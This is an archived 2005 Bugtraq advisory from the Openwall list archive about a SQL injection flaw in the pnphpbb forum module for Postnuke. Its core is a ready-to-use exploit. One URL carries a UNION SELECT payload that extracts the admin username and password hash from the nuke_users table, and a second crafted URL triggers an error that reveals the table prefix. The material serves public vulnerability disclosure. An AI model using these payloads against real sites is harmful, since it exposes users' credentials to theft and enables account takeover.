lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050301221521.7282.qmail@www.securityfocus.com>
Date: 1 Mar 2005 22:15:21 -0000
From: JoCaNoR SeCuRiTy TeaM <jocanor@...il.com>
To: bugtraq@...urityfocus.com
Subject: [ Postnuke all versions + pnphpbb <=1.2 sql injection - jocanor ]





[Postnuke all versions + pnphpbb <=1.2 sql injection - jocanor]

Author: Jocanor
Date: 01-03-2k5


1. -----------introduction--------.

Postnuke is an open source CMS (content management system), originally based in php-nuke. (www.postnuke.com)

pnphpbb is a module for postnuke based in popular forum system phpbb. (www.phpbb.com)

2. ------------the bug------------

in 26 -03-04 janek vind discovers a bug in phpbb forums, in prvmsg.php file described in the bugtraq id 9984 and the bug affects also to php-nuke; butraq privades exploits for exploit this bug in php-nuke and phpbb.

But the module Pnphpbb (postnuke phpbb) is also vulnerable to this issue, and its easy to exploit:

http://www.example.com/index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20[sql here]

3 -------- the exploit ----------

Working exploit:

http://www.example.com/index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20pn_uname,pn_pass,pn_pass,pn_pass,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20nuke_users%20where%20pn_uid=2/*

Show password hash for the user with uid = 2.

4. ------important notes-----

Note: if don't works, changue the prefix nuke_ for the valid prefix, you can get the valid table prefix causing an error like this:

http://www.example.com/index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20'


5----- Contact -----

Author: Jocanor 
Location: Spain
Email: jocanor [at] gmail [dot] com

JoCaNoR SeCuRiTy ReaSoNS

EOF.


Powered by blists - more mailing lists